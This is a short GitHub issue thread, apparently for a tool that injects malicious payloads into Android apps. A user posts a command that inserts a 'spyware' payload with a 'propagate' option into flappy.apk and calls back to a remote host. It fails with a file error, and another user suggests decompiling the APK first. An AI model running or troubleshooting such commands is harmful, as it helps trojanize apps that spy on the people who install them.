Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

error #3

Open
pretech86 opened this issue Dec 10, 2019 · 1 comment
Open

error #3

pretech86 opened this issue Dec 10, 2019 · 1 comment

Comments

@pretech86
Copy link

i used this command
python3 sci.py -a /root/Desktop/flappy.apk payload spyware -ppg propagate -rh 192.168.8.123
and it give the following error
FileNotFoundError: [Errno 2] No such file or directory: '../tmp/classes.dex'

can you help me please

@Morsmalleo
Copy link

i used this command python3 sci.py -a /root/Desktop/flappy.apk payload spyware -ppg propagate -rh 192.168.8.123 and it give the following error FileNotFoundError: [Errno 2] No such file or directory: '../tmp/classes.dex'

can you help me please

Try Decompiling the flappy.apk first then run your command again like this

python3 sci.py -a /root/Desktop/flappy payload spyware -ppg propagate -rh 192.168.8.123

Maybe that might work.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants